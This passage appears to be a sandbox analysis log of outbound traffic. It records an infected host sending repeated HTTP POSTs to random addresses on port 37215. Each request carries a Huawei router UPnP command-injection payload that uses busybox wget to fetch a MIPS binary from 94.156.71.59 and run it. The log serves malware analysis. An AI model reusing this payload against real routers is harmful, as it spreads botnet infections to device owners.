                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            840192.168.2.1351482156.161.132.2537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.837955952 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            841192.168.2.1357412197.106.115.5437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.839298964 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            842192.168.2.1338198156.94.92.16137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.840961933 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            843192.168.2.1359676197.35.23.21537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.842261076 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            844192.168.2.1350194156.3.211.24437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.843717098 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            845192.168.2.1355898197.40.65.6137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.844763041 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            846192.168.2.1358594156.142.47.537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.845834970 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            847192.168.2.1353768156.122.197.1437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.846884012 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            848192.168.2.1346436156.234.121.19637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.847965002 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            849192.168.2.1341440197.11.180.15937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.849195957 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
